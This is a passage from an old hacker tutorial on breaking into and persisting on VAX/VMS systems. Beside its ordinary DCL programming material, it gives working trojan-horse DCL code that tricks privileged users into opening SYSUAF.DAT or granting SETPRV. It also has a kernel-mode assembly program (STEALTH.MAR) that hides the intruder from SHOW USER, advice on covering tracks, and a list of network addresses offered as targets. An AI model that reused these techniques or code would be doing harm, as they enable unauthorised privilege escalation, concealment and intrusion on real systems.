manager to create new users.  It is a DCL file which simplifies the task of
creating new users by prompting you for all the necessary parameters.  If this
file does not exist on the system, here I have outlined the manual method of
creating a new user (this is the FULL setup):

$sd sys$system
$run diskquota

NOTE: All variables that you must enter are in square brackets, eg. [uic]

QUOTA>add [uic] /perm=[quota]/overdraft=[overdraft]

Basically this sets up how much disk space is allotted to the user.  The quota
usually ranges from 1000 blocks to 100000 blocks.  The overdraft is usually 10%
of the quota.  A good setting to keep this at is around 20000 for the quota.

$create/dir/owner=[uic]/prot=(s,o=rwed,g,w) [directory]/log

This will add in your directory and set its protections.

$run authorize

UAF> add [username]/own=[fullname]/acco=[account]/dev=[device]/dir=[directory]-
     /uic=[uic],[privs]/passw=[password]

The items here are:
username  -the name you will use on the system, eg. SMITHJ
fullname  -your actual name, eg John Smith. (of course you don't use your REAL
           name!!)
account   -your account name, usually used for billing purposes
device    -the drive that contains your directory
directory -your login directory. Best to keep an existing one
uic       -your UIC remember format: [group,member]
password  -your account password. You can enter whatever you want here
privs     -your account privileges. Normal is TMPMBX and NETMBX.  If you must
           then specify SETPRV to give you full access to the system

That ties up this section.  For further information about a specific qualifier
just type HELP from the UAF> prompt.

KERMIT
------

Kermit is a file transfer program found on most VAX systems.  It allows the
transfer of files over terminal lines from a remote KERMIT program to the local
KERMIT program.  Invoking Kermit can be done in several ways depending on the
system.  Usually the file is located in the SYS$SYSTEM directory.  The usual
method to start kermit is:

$kermit

NOTE: some machines it may be KERMIT-32 or some other variation.

This may vary on different machines, you may have to RUN the file, or it may
have to be passed parameters such as KERMIT 1200 or KERMIT 2400.  In any case
once you have initiated the program, you should get a kermit prompt:

KERMIT>

Here you can issue several different commands. Following is a list with brief
explanations:


COMMAND     DESCRIPTION
-------------------------------------------------------------------------------
connect   !connects you to a virtual terminal, issue AT commands from here.
exit      !return to DCL
quit      !return to DCL. Same as above
receive   !Single file download from another machine
get       !identical to receive
bye       !terminates a transaction with another kermit in server mode
finish    !same as above but doesn't exit to DCL
send      !Send a file to another machine
server    !causes kermit to enter server mode
set       !set parameters such as parity, delay etc
show      !show the parameters set up currently
status    !current status such as number of bytes transmitted etc
[spawn]   !spawn a subprocess
[local]   !enter VMS commands
-------------------------------------------------------------------------------

The last two commands (in brackets) are not always found on every system, but
briefly they allow you to spawn a subprocess (often useful when you are tied up
in a non-breakable account) and local which can again be used to spawn or issue
other DCL commands.  There are often other commands, varying on what version of
KERMIT is being run.  One important note is that SPAWN cannot be issued from a
CAPTIVE account, but LOCAL (or an equivalent) can.  However, if the system
manager is smart he may set up the UAF record to specify that only one process
can be active with that account at any one time.  If this is the case it will
give you a message telling you that you have exceeded the quota allocated.  The
only way around it is to actually modify the record in SYSUAF.DAT Obviously the
important commands are SEND,RECEIVE and CONNECT.  Once you issue CONNECT, you
can dial out long distance or whatever, just by using regular AT commands.
SEND and RECEIVE are self explanatory so I wont go into them.


DECSERVERS
----------

This deserves a little bit of attention also.  Basically DECservers allow the
the user to easily switch between various nodes in a cluster.  Unless you are
logging in directly to a terminal, you will usually not encounter this.  If you
do, heres what you will see:

Enter Username>

Or something of the like.  At this point you should just type A or C or
whatever else.  It is just a terminal identifier and means absolutely nothing.
At this point you will get a prompt such as:

LOCAL>

Here you can do a limited number of commands.  The important ones are:

LOCAL> show users

This will show the users on the DECserver, and what machines they are connected
to etc.  To view all the machines on the server, type:

LOCAL> show nodes

This will present a list of the callable nodes.  To connect to any one of these
you would issue a command such as:

LOCAL> connect SBSU

This is assuming the nodename was SBSU.  That's basically all there is to the
DECservers.  The other commands are really not that useful to the beginning VAX
hacker but can nonetheless be referenced by typing HELP at the LOCAL prompt.


SYSTEM DUMP ANALYZER
--------------------

  Although the SDA is not really for beginners, it is such an important topic
that I thought I would give a really brief overview of what it is all about.
Basically to call up SDA, type:

$analyze/system

This will return you with the prompt:

SDA>

At this point you can do many great things.  Oh, before I continue, it should
be noted that you need CMKRNL privilege in order to run this program.  In any
case, once you get the SDA prompt, there are several interesting things you can
do.  Basically, SDA is a watching tool.  It lets you keep track of what other
processes on the system are doing.  To get information on another process just
type:

SDA> show process [username]

you should put in a person who is logged in where I have put the [username]
variable.  This will give you a page of useful information on that specific
process.  The interesting thing is that with the SDA, you can access any part
of memory, unlike EXAMINE from DCL.  You can for example get the PCB address
for a process and then go in and either view or modify things such as privs,
priority etc.  You can also view other processes type-ahead buffers, and see
what they are doing.  Like I stated earlier, this is a relatively advanced
topic and doesn't fit well into a beginners file, so I will leave it at this,
but here I will provide a diagram of the PCB block so that you can see which
bytes do what:


                        - SOFTWARE PCB DETAILED LAYOUT -

                    BLOCK 1                           BLOCK 2

              +---------------+                +---------------+
:pcb$l_sqfl   !               !                !               !:pcb$t_terminal
              +---------------+                !               !
:pcb$l_sqbl   !               !                +---------------+
              +---+---+-------+                !               ! :pcb$l_pqb
:pcb$b_type   !   !   !       ! :pcb$w_size    +---------------+
 pcb$b_pri    +---+---+---+---+                !               ! :pcb$l_efcs
:pcb$w_mtxcnt !       !   !   ! :pcb$b_astact  +---------------+
              +-------+---+---+  pcb$b_asten   !               ! :pcb$l_efc2p
:pcb$l_astqfl !               !                +---------------+
              +---------------+                !               ! :pcb$l_efc3p
:pcb$l_astqbl !               !                +---------------+
              +---------------+                !               ! :pcb$l_pid
:pcb$l_phypcb !               !                +---------------+
              +---------------+                !               ! :pcb$l_phd
:pcb$l_owner  !               !                +---------------+
              +---------------+                !               ! :pcb$t_lname
:pcb$l_wsswp  !               !                !               !
              +---------------+                !               !
:pcb$l_sts    !               !                +---------------+
              +---------------+                !               ! :pcb$l_jib
:pcb$lwtime   !               !                +---------------+
              +---+---+-------+                !               ! :pcb$q_priv
:pcb$b_wefc   !   !   !       ! :pcb$w_state   !               !
 pcb$b_prib   +---+---+-------+                +---------------+
:pcb$w_tmbu   !       !       ! :pcb$w_aptcnt  !               ! :pcb$l_arb
              +-------+-------+                +---------------+
:pcb$w_ppgcnt !       !       ! :pcb$w_gpgcnt  !               ! :pcb$l_uic
              +-------+-------+                +---------------+
:pcb$w_biocnt !       !       ! :pcb$w_astcnt  !               ! :pcb$l_lockqfl
              +-------+-------+                +---------------+
:pcb$w_diocnt !       !       ! :pcb$w_biolm   !               ! :pcb$l_lockqbl
              +-------+-------+                +---------------+
:pcb$w_prccnt !       !       ! :pcb$w_diolm   !               ! :pcb$l_dlckpri
              +-------+-------+                +---------------+

NOTE: BLOCK 2 is just a continuation of BLOCK 1.  The PCB is the Process
      Control Block which is assigned to each process. It holds all the
      relevant information for the particular process.  The address for
      the PCB is shown when you execute the SHOW PROCESS <user> from SDA

Note that when you are examining memory you can specify addresses in two ways:

      1) locationA:locationB   -from locationA to locationB
      2) locationA;numbytes    -from locationA to locationA+numbytes

FURTHER HELP
------------

Like I have stressed throughout this file, the best way to learn about VMS is
to use the ONLINE HELP that is available on virtually every VAX.  You may have
also noticed that certain programs such as MAIL have self-contained help which
is not seemingly accessible from the normal HELP.  So how do you get that
information?!  Well, all the extra help files for programs such as MAIL, SDA,
AUTHORIZE, etc are all stored in the SYS$HELP directory.  The only problem is
that they are not in very human readable form.  To get a properly formatted
text output you can use the LIBRARY command.  Here is an example that dumps all
the help file on SDA into a file called SDA.HLP in your directory:

$library/extract=(*)/output=sys$login:sda sys$help:sda.hlb

Now to explain this line.  The library program will extract the SDA help file
(sys$help:sda.hlb) and put it into your login directory (sys$login:sda.hlp).
Where I have put the (*), you can alternatively put any number of commands that
you may want referenced.  The (*) will dump ALL the commands into the help file
For example to ONLY get the SHOW command and its qualifiers (for SDA) into a
file, you may try something like:

$library/extract=(show)/output=sys$login:sda_show  sys$help:sda.hlb

Since the files generated from this command is standard ASCII, you can read
these help files with the TYPE command, ie.

$type sys$login:sda.hlp

The same method can be utilized for any of the other commands to which you
normally do not have access, eg. AUTHORIZE, SDA etc.  This way you can learn
and understand the command without necessarily having the privilege of reading
it in the first place.  Of course I recommend that you read both the AUTHORIZE
and SDA files since they are probably the most useful files in the bunch.  To
get a list of the other help files, just do:

$dir sys$help:*.hlb

Then you can specify any of the listed files in the LIBRARY command. If you
create these files, just make sure you delete them, once you are through with
using them, especially if they are in someone elses ACTIVE account.



TROJAN HORSES
-------------

Lets suppose you have done all you can in trying to gain privileges, and you
have neither come up with a high level account, or any mechanism of boosting
your privs. Now what? Well the following methods I will describe should be able
to net you more privileges but there is one small problem.  These methods
usually involve modifying or creating new files in certain places.  If the
system manager were to notice such a file, he could simply perform a DIR/OWNER
and would know which account someone was hacking on, and he would no doubt
change the password or kill the account.  Now this is an IF situation. Although
theres a good chance you will get away with it, you still have that risk factor
that says that you may very well lose this particular VAX.  So if this is the
only VAX that you have access to, and you are still in the learning process,
don't try these techniques.  Once you have learned the operating system well
enough and feel that you can afford to lose the VAX if worst comes to worse
then you can proceed with these time honoured techniques:

Ok so what is a trojan horse?  Based on the original definitions for such
programs, a trojan is simply a file that you have someone execute which
performs some arbitrary task unbeknownst to the user.  Of course there are the
typical trojan programs that go through the logon sequence and try and procure
user/password combinations. This is fine, but what about other methods?  Its
fine for getting more accounts, some which may be possibly privileged, but you
still aren't guaranteed to get a good account.  So what do you do?!  Well, as
everyone should know by now, the easiest way to get more privileges is to give
them to your user via the AUTHORIZE program.  The problem is that on all VAXes,
the SYSUAF.DAT file is read/write protected and on some even the AUTHORIZE file
itself is protected.  The key is to unlock these files, so that they can be
accessed through the WORLD protection field.  The easiest way to do this is to
have a privileged user unwittingly do the dirty deed for you.  Here I will
describe a few methods of accomplishing such a task.

 The key here is to find a COM file that the users often use.  This could be
anything from some simple utility to a full featured DCL program such as
ADDUSER.COM.  What I usually do is search through the system symbols (SHOW
SYMBOL *) and logical table (SHOW LOGICAL) for definitions that are executed
via COM files.  Often you will find in the symbol table some weird utility
like NOTES that everybody executes. Lets assume you have found a prospective
program.  The next thing to check is to see if you write access to the
direcotry in which this file resides.  If you have READ access also, then you
can simply put in your TROJAN coding right within the main program (after
saving the original copy somewhere safe).  If you don't have read access, then
you can create a program with the same filename.  Since your program will have
a higher version number, it will get executed instead of the original program.
Then you perform your deed and delete the TROJAN and continue on and execute
the real COM file.  Here is an example, which is a fragment of a DCL routine
but can easily be changed to fit inside another routine.


$ pre_prvs=f$setprv("setprv")
$ if f$privilege("setprv") then goto fix
$ @notes.com;55
$ fix:
$ set prot sys$system:sysuaf.dat/prot=(w:rwed)
$ set prot sys$system:authorize.exe/prot=(w:rwed)
$ pre_prvs=f$setprv(pre_prvs)
$ @notes.com;55


In this example we have created another file called notes.com;56 in the proper
directory.  Whenever someone types in NOTES this file gets executed instead of
the original.  When control is passed here, it checks if the user has SETPRV
privilege.  If he doesn't, it continues on with the normal program
(NOTES.COM;55) If the user has the SETPRV privilege, you have the program
change the protection on SYSUAF.DAT and AUTHORIZE.EXE to full World Access.
This means that you can now run AUTHORIZE from ANY ACCOUNT no matter how lowly
it is!!!  Is that awesome or what?!   Once the protection has been changed, you
can erase the notes.com;56 file and no one will ever know anything happened!
Similarly if you modified the actual DCL program, then you just copy back the
original.  Remember its extremely important to tidy up after yourself once you
are done!

 Here is another example, which you may want to try. First of course you MUST
check for the privileges of the user (just like in the above program), then
try:

$open/write file sys$scratch:adduaf.tmp
$write file "$ RUN SYS$SYSTEM:AUTHORIZE"
$write file "MODIFY NAME/PRIV=SETPRV"
$close file
$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
$del sys$scratch:adduaf.*;*


This little patch in the coding will modify your own users privileges and give
them SETPRV when the superuser executes this routine.  The trick is to hide it
within some other program so he doesn't even realize he has done anything! Of
course after the routine has been successfully executed, the original coding
should be put back.  There are many places you can put this routine, including
ADDUSER.COM (if you have write access)!  That would mean, every time the
system manager went to add a new user, he would also boost your privs! HaHa,
quite ironic eh?!  The farthest thing that he wants to do, and you make him do
it without even realizing.  Of course you should use your imagination and put
this or a similar routine in a place where it will be quickly executed.  The
longer the code stays around without being execute, the more chance that it
will be discovered.  An optimum program would be something that the
users/operators execute frequently (eg notes, mail, phone etc)  Other good
places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your
tracks once you're done!!

 This is but a brief introduction to Trojans and the like.  You should use your
own imagination to come up with other ways of making the system operators
succumb to your wishes...heh heh.


DCL PROGRAMMING
---------------

 No file would be complete without at least mentioning programming Command
Procedures.  Basically, these are like BAT files from MS-DOS or script files
from UNIX.  They form a rudimentary but powerful language that allows you to
quickly create small programs to handle most simple tasks.  This section is not
intended to be a a full blown tutorial on programming in DCL, rather its an
introduction to what it is all about.
 It is quite easy to pick up programming in DCL and the best way to learn is to
have a look at some of the COM files you will find on the various VAXes that
you hack on.  By studying these, you can quickly learn the methods on how to
perform
certain routines.  Below I have listed some of the commonly needed routines
when programming in DCL:


PASSING PARAMETERS

Parameters can be passed to DCL programs directly from the shell in several
ways. Here are a few examples:

(1) @sample 24 25

    When you execute this, the values 24 and 25 are passed to the sample.com
    file in the variables p1 and p2 respectively. ie p1=24, p2=25

(2) @sample Paul Cramer

    p1=PAUL,  p2=CRAMER

(3) @sample "Paul Cramer"

    p1=Paul,  p2=Cramer

(4) name= "Paul Cramer"
    @sample 'name'

    This example demonstrates the method of passing predefined variables to a
    command procedure.  In this case,  p1=PAUL,  p2=CRAMER

(5) name ="""Paul Cramer"""
    @sample 'name'

    Note that passing the variable in three double-quotes preserves the case.
    p1=Paul,  p2=Cramer



GETTING INPUT

  Often it is necessary to get some sort of input from the user when executing
a command procedure.  This is performed through the INQUIRE command. Some
examples follow:

(1) INQUIRE variable "prompt"

    This will display the 'prompt' message and then wait for input.  The string
    passed is kept in 'variable'

(2) INQUIRE/NOPUNC variable "prompt"

    When you specify /NOPUNC, the prompt will NOT be followed by a colon and
    space as is the default.

(3) INQUIRE/LOCAL variable "prompt"
    INQUIRE/GLOBAL variable "prompt"

    It should be noted that if you specify /LOCAL, the variable will remain in
    the local symbol table accessible only by this particular COM file.  If on
    the other hand, you specify /GLOBAL, the variable is placed in the global
    symbol table and is made accessible to other files.

(4) IF pn .eqs. "" THEN INQUIRE pn "prompt"

    You can use this method to check if a certain variable (pn in this case) is
    null or not.  If it is, you can ask for input.

(5) READ/PROMPT="prompt" SYS$COMMAND variable

    This is another method of getting input.



SUPPLY INPUT FOR A PROGRAM

Often you may need to create a file and get input from some outside source.
Again there are several ways of doing this.  Here I will outline three
different methods:

FROM DATA      :- CREATE TEST.DAT
                  data line 1
                  data line 2
                       :
                       :
                    etc etc

FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
                  CREATE TEST.DAT

FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
                  CREATE TEST.FILE


OUTPUTTING INFORMATION

In general when outputting information, you should always send it to SYS$OUTPUT
What this does is automatically write to whatever the user has defined as
SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it
will send it in the correct format.  Some examples follow:

(1)  WRITE SYS$OUTPUT "literal text"

     This will print 'literal text' on your terminal.

(2)  WRITE SYS$OUTPUT symbol-name

     This will print on your terminal whatever value is held in symbol-name

(3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"

     This example shows how you can mix in normal text with a variable and
     follow it by more text.

(4)  TYPE SYS$INPUT
     this is a sample message
     that is spread out over
     several lines.

     You would use this method whenever there are more than a few lines of text
     to be printed.



WRITING TO A FILE

You will find that many times when writing a COMmand procedure you will need to
save certain information to a file.  This can be accomplished with a routine
similar to:

OPEN/WRITE FILE TEST.DAT
WRITE:
 INQUIRE DATA "Input Data"
 IF DATA .EQS. "" THEN GOTO DONE
 WRITE FILE DATA
 GOTO WRITE
DONE:
 CLOSE FILE

I will give a quick breakdown of what is going on here.  First you open the
file that you want, including the /WRITE qualifier followed by the filename.
This sample program simply inputs data, writes each line to a file and exits
when the user hits RETURN on a blank line.  Simple but effective text input
facility.



READING A FILE

Once you have written a file, you will often need to read that information back
in again. For example you may keep track of when the person last ran the file.
Each time the file is run, you would save the time/date to a file, and then
read it back in, and display it on each subsequent execution.  The sample
structure of a read routine would be:

OPEN/READ FILE TEST.DAT
READ:
 READ/END_OF_FILE=DONE FILE DATA
      .
      .
      .
 GOTO READ
DONE:
 CLOSE FILE

This routine would loop and keep reading a file, one line at a time, storing
the information in DATA until the end of file is detected.



CONDITIONAL LOGIC

No programming language would be complete without the ability to perform logic.
Although it is very simplistic, it provides just enough power to handle most
simple conditions.  Some examples:

(1) IF p1 .EQS. "" THEN GOTO DEFAULT

    In this example the procedure checks to see if the parameter passed in p1
    is NULL or not.  If it is then the program branches to DEFAULT

(2) IF p1 .NES. 10 THEN GOTO end_label
           .
           .
           .
    END_LABEL:

    Here we see that if p1 does not equal 10 then the program branches to
    END_LABEL, otherwise it continues.

(3) COUNT = 0
    LOOP:
     COUNT=COUNT+1
        .
        .
        .
     IF COUNT .LE. 10 THEN GOTO LOOP
    EXIT


    This example shows how to establish a loop in a command procedure, using
    the symbol COUNT and an IF statement.  The IF statement checks the value
    of COUNT and performs an EXIT when the value is greater than 10


EXPRESSIONS

   The data operations and comparisons are listed below in order of precedence
beginning with the highest (operations and comparisons grouped together in the
table have the same precedence).


   +--------+---------------------------------------------------------+
   Operator                    Description
   +--------+---------------------------------------------------------+
      +     Indicates a positive number
      -     Indicates a negative number
   +--------+---------------------------------------------------------+
      *     Multiplies two numbers
      /     Divides two numbers
   +--------+---------------------------------------------------------+
      +     (1) Adds two numbers
            (2) Concatenates two character strings
      -     (1) Subtracts two numbers
            (2) Subtracts two character strings
   +--------+---------------------------------------------------------+
    .EQS.   Tests if two character strings are equal
    .GES.   Tests if first character string is greater than or equal
    .GTS.   Tests if first character string is greater than
    .LES.   Tests if first character string is less than or equal
    .LTS.   Tests if first character string is less than
    .NES.   Tests if two character strings are not equal
    .EQ.    Tests if two numbers are equal
    .GE.    Tests if first number is greater than or equal to
    .GT.    Tests if first number is greater than
    .LE.    Tests if first number is less than or equal to
    .LT.    Tests if first number is less than
    .NE.    Tests if two numbers are not equal
   +--------+---------------------------------------------------------+
    .NOT.   Logically negates a number
   +--------+---------------------------------------------------------+
    .AND.   Combines two numbers with a logical AND
   +--------+---------------------------------------------------------+
    .OR.    Combines two numbers with a logical OR
   +--------+---------------------------------------------------------+




LEXICAL FUNCTIONS
-----------------

That concludes the introduction to DCL programming.  One thing that you should
keep in mind is that many powerful string editing and environment information
commands can be accessed from COM files.  These are called the LEXICAL
functions There are too numerous to list them all here, so I will just provide
a summary of the primary lexical functions and a brief description:



LEXICAL       DESCRIPTION
-------------+------------------------------------------------------------------
f$cvsi       !converts character string data (signed value) to an integer
f$cvtime     !retrieves information about an absolute, combination, or delta
              time
f$cvui       !converts character string data (unsigned value) to an integer
f$directory  !returns the current default directory name string
f$edit       !edits a character string based on the edits specified
f$element    !extracts an element from a string in which the elements are
             !separated by a specified delimiter
f$environment!obtains information about the DCL command environment
f$extract    !extracts a substring from a character string expression
f$fao        !converts the control string to an ASCII string
f$file_attrib!returns attribute information for a specified file
f$getdvi     !returns parameters for a specified device
f$getjpi     !returns accounting, status and identification info for a process
f$getsyi     !returns status and identification information about local or
             !remote nodes.
f$identifer  !converts an identifier in named format to its integer equivalent
f$integer    !returns the integer equivalent of the result of an expression
f$locate     !locates a character substring within a string and returns its
             !offset within the string
f$logical    !translates a logical name and returns the equivalence name string
f$message    !returns the message text associated with a system status code
f$mode       !shows the mode in which the process is executing
f$parse      !parses a file spec and returns either the expanded file spec or
             !a particular field that you specify
f$pid        !for each invocation, returns the next PID in sequence
f$privilege  !returns a value of TRUE or FALSE depending on whether your
             !process privileges match the privileges listed in the argument
f$process    !returns the current process name string
f$search     !searches the directory and returns the full file spec for any
              file
f$setprv     !sets the specified privileges and returns the previous state
f$string     !returns the string equivalent of the result of the specified
             !expression
f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc
f$trnlnm     !translates a logical name and returns the equivalent name string
f$type       !determines the data type of a symbol
f$user       !returns the current user identification code (UIC)
f$verify     !set or read current command procedure state
-------------+-----------------------------------------------------------------

This list just outlines the main lexical functions.  Within each function there
may be many more subfunctions.  If you need help on any of these functions or
their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($)



ERROR MESSAGES
--------------

 Occasionally when you are using DCL, you will come across error messages that
are sent to you by the VAX.  Here I will give a break down of what the
different fields in the message represent and how to interpret them. First of
all, the general format of an error message is:

%facility-l-ident, text

NOTE: not all messages are ERROR messages.  Often it is only an informational
      message telling you that a certain task was successful or whatever. In
      any case here is what each field means:

facility  -this is the name of the facility that produced the  error (for
           example, CLI for the Command Language Interpreter).

l         -this is a one letter code indicating the severity of the error.
           The severities are:

                  I - Informational      E - Error
                  S - Success            F - Severe error
                  W - Warning

ident     -this is an abbreviation for the message text.

text      -this is a short description of the nature of the error.


Here is an example of an error message, and how to interpret it:

%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege

The percent sign in the beginning tells you it is a system message from the VAX
the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field
(F) shows that it is a severe error.  The third field (NOCMKRNL) is a short
abbreviation showing that you do not have the CMKRNL privilege, and the actual
text is followed giving the error in detail, explaining that you MUST have the
CMKRNL privilege to perform that particular command.

SAMPLE PROGRAMS
---------------

Here I present two sample programs. One is the STEALTH assembly language
program that allows you to hide from SHOW USER.  The other program is a DCL
COM file that allows you to keep track of who is logging on and off.


WATCHDOG.COM
------------

  Instead of typing the program into the VAX manually, you can just cut this
program out in your favorite text editor and save it to a file. Then at the DCL
($) prompt type:

$create watchdog.com

Then transmit this file over your buffer.  After the file is transmitted, hit
CTRL-Z.  This will bring you back to the DCL prompt.  At this point you can now
use this file. To enable watchdog, type:

$@watchdog

Basically I wanted to present a COM file to give you an idea of how one works.
I have tried to throw in a lot of the different techniques that you can use
from COM files into this one example.  In addition to providing you with a
good example of how COM files can be manipulated, this program also serves as
a valuable utility that you can use to monitor the system that you are on.
 The idea behind watchdog is to keep track of all the people who are logging in
or out of the system. This can be a very handy tool to keep a watch out for
system operators etc. The nice thing about this program is that it runs in the
background, so that you can continue to do whatever you want.  You should note
how I go about creating another file (watch.com) from within the main watchdog
program. This of course wasn't necessary since I could have put the whole thing
into one file and you could just as easily type: spawn/nowait @watchdog, but
like I stated earlier, the intention is to give a short tutorial on some of the
techniques that you can employ.  I have also used several lexicals within the
program to give you an idea of how you can use them within your own creations.

NOTE: you can terminate WATCHDOG at any time by hitting CTRL-Y, and restart it
      using: @watchdog



---------------------------------- cut here -----------------------------------

$ !WATCHDOG.COM  by ENTITY /CCC!
$ !Usage: @watchdog
$ !
$ !This handy little utility runs in the background, freeing you to perform
$ !other tasks, while at the same time keeping track of who is logging ON or
   OFF
$ !the system. It is a simple demonstration of how powerful DCL programming can
$ !be when it is used together with the lexical functions.
$ !
$ !CTRL-Y will terminate the WATCHDOG subprocess at any time.  The program
$ !also automatically terminates when you log off.
$ !
$ create watch.com
$ deck
$ on control_y then goto terminate
$ del watch.com;*
$ w := write sys$output
$ node    = f$getsyi("nodename")
$ cpu     = f$extract(1,3,f$getsyi("node_hwtype"))
$ version = f$getsyi("version")
$ boot    = f$extract(0,17,f$getsyi("boottime"))
$ w "WATCHDOG  on  ''node'  VAX-11/''cpu'  VMS ''version'"
$ w "Up since ''boot'      (c) 1989 Entity"
$ list = "watch1.dat"
$ gosub file_io
$ c1 = c
$ loop:
$ list = "watch2.dat"
$ gosub file_io
$ c2 = c
$ if c1 .eq. c2 then goto loop
$ if c2 .gt. c1 then goto newuser
$ file  = "watch1.dat"
$ file2 = "watch2.dat"
$ gosub compare
$ w "--- ''a' ---  ''timelog' "
$ goto loop
$ newuser:
$ file  = "watch2.dat"
$ file2 = "watch1.dat"
$ gosub compare
$ w "+++ ''a' +++  ''timelog' "
$ goto loop
$ !
$ ! Construct a UserList of processes currently logged in
$ !
$ file_io:
$ c = 0
$ sho users/output = watch.dat
$ open/share/read in watch.dat
$ open/share/write out 'list'
$ read in a
$ read in a
$ read in a
$ lp01:
$ read/end_of_file=fin1 in a
$ write out a
$ c = c + 1
$ goto lp01
$ fin1:
$ close in/nolog
$ close out/nolog
$ purge watch.dat
$ purge 'list'
$ return
$ !
$ ! Get a formatted output of the current TIME and DATE of LOGIN/LOGOUT
$ !
$ gettime:
$ temp = f$extract(3,3,f$time ())+" "+f$extract(0,2,f$time())+","
$ temp = temp + f$extract(7,4,f$time())+"  "+f$extract(12,5,f$time())
$ timelog = f$cvtime("today",,"weekday")+" "+temp
$ return
$ !
$ ! Compare the Userlist to a previous listing
$ !
$ compare:
$ open/share/read in 'file'
$ lp02:
$ read/end_of_file=fin2 in a
$ a=f$fao("!12AS",a)
$ set message/noid/nofac/notext/nosev
$ search 'file2' 'a'
$ chk = $severity
$ set message/id/sev/fac/text
$ if chk .eqs. "1" then goto lp02
$ fin2:
$ close in/nolog
$ gosub gettime
$ c1 = c2
$ copy watch2.dat watch1.dat
$ purge watch1.dat
$ return
$ !
$ ! Terminate process and cleanup.
$ !
$ terminate:
$ w "USER TERMINATION OF WATCHDOG!"
$ set message/nofac/noid/notext/nosev
$ del watch*.dat;*
$ set message/fac/id/text/sev
$ pid = f$getjpi("","PID")
$ stop/id='pid'
$ eod
$ spawn/nowait @watch.com
$ exit

---------------------------------- cut here -----------------------------------


NOTE: Notice the little trick that I employ on the 16th line of the DCL file:
      I have the program delete itself!  This can be VERY useful in many
      applications where you don't want the program lying around after it has
      been executed once (eg. trojan horses!)




STEALTH.MAR
-----------

 Ok here i present the stealth.mar program.  This little assembler beauty lets
you hide from the SHOW USER command!  Very useful for remaining undetected on
VAX/VMS systems.  Ok first heres the program:



---------------------------------- cut here -----------------------------------

.library /sys$library:lib.mlb/
.link /sys$system:sys.stb/
$pcbdef
.entry no_user,^m<>
$cmkrnl_s routin=blast_it
ret
.entry blast_it,^m<>
tstl pcb$l_owner(r4)
bneq outta_here
bbcc #pcb$v_inter,pcb$l_sts(r4),outta_here
clrb pcb$t_terminal(r4)
decw g^sys$gw_ijobcnt
bisl #pcb$m_noacnt,pcb$l_sts(r4)
outta_here:
movl #ss$_normal,r0
ret
.end no_user

---------------------------------- cut here -----------------------------------


Ok heres the instructions on using it.  First create the file stealth.mar on
the VAX. This can be accomplished by:

$create stealth.mar

Then transmit this file through the buffer option in your terminal program.
After you finish the transmit, hit CTRL-Z to exit the create file option. At
this point you will be put back into DCL.  Then perform the following steps:

$macro stealth
$link /nomap stealth
$delete stealth.obj;*
$delete stealth.mar;*
$run stealth
$del stealth.exe;*
$show system

At this point, your screen will fill up, showing you all the active processes.
Make a note of the processes that have the format: "symbiont_xxxx" Look for the
last available one, then increase the number by 1.  For example if the last
symbiont process was "symbiont_0003" then you should type:

$set proc/name="symbiont_0004"

This will effectively name your process as a printer driver, thereby making it
even harder to detect you.  Of course you are not safe from the SDA (since it
can access memory directly) but it affords quite a bit of protection
nonetheless Ok one small note, you require CMKRNL privilege to execute this
file (because of the Change To Kernal Mode command in the 5th line of the
code).  One other point that I want to make is that you should NEVER leave the
.MAR or .OBJ file for STEALTH on ANY system!  The best thing is to either hide
the EXE file in some remote directory or delete it, after you execute it.  It
doesn't hurt to play it safe!


NOTE: a programming note, if you need to access the symbols defined by the
    system, such as the number of users online etc, you should link the system
      symbol table to your OBJ file. The actual file is: sys$system:sys.stb




DATAPAC VAX LISTING
-------------------

    Here I provided a partial list of CANADIAN VAXes hooked up on DATAPAC.
These have been provided merely as a hacking exercise to get you started, and
as such i have not listed any user/password combinations.  Some of these have
regular defaults, other have variations, and yet others require some thinking
and good luck to get in!  One small point, since all of these are Canadian
I have not bothered to include the DNIC.  So if you are calling through lets
say telenet and for example if the nua in the listing is 38701020 then to
connect to it, use the NUA 0302038701020  (ie add a 03020 to the beginning).
All of these VAXes were up and operating at the time of writing...

CANADIAN VAX LISTING
--------------------

 21700051          66200071            43700018            93800046
 76600029          62400061            87400010            91100024
 62700151          30400017            33400620            95100160
 41500778          88500561            93600010            66700024
 70700033          88500100            36700026            87400010
 85800778          76150042            36700027            90400156
 60500417          56290039            36700581            95100160
 64100146          55400127            36700178            91100024
 35600330          83500600            39100556            62700056
 44200519          49900053            36700211            59600384
 44600032          78100120            20500047            60100175
 88100073          64700253            85701445            63100131
 20500366          69200295            28330324            85701445
 44400900          97500075            28361325            63300483
 72101099          83400117            28362116            59500120
 64700029          95100160            36700140            78100265
 71100755          91100024            43700018            21450017
 53700306          49700003            54100112            93800393
 38700165          63300483            48500127            70700033
 24400263          78100651            57100010            43700230
 22500019          78100265            45800116            30500037
 68100563          78100092            54100013            37200020


CONCLUSION
----------
Ah, that be it!  I hope you enjoyed the file and found it informative.  As i
stated earlier, it was not intended to be an advanced course on VAX hacking,
merely an introduction to whet your appetite and lead you on to bigger and
better things.  Since this file was put together in quite a hurry, i realize
that it isn't properly organized, and i am sure i forgot to mention some
important things, so i must apologize for that.  I also didn't get a chance to
verify all of the diagrams and charts I have put in (a lot of it was from
memory) but to the best of my knowledge all of this information is correct.
One minor point is that some commands may perform a bit differently on
different versions of VMS.  For example the SHOW USER output that I have
described is quite different in version 4.4 from version 5.1 The main ideas
that I have described however, apply to all versions of VMS, and you shouldn't
have any difficulties.

If you have any comments, suggestions, criticisms or even questions, i would be
glad to hear from you.  You can reach me in several ways.  First i can be found
on these boards:

CCC HQ :  (416)/398-3301    User:GUEST,  PW:GUEST
NODE 13:  (416)/756-4545    type  !!  ,login:LYNX

You can also reach me on QSD (France): 33-36-43-15-15, leave mail to ENTITY.
If you are calling through a Packet Switching System, then you can reach call
the QSD NUA at: 0208057040540.  You can also probably find me hanging around
on these CHAT systems:

TCHH  :026245400050570   login: guest
ALTGER:026245890040004   login: guest


 Now before I take off, I would like to thank some people who have made hacking
VAX/VMS possible and a helluva lot more fun for me!

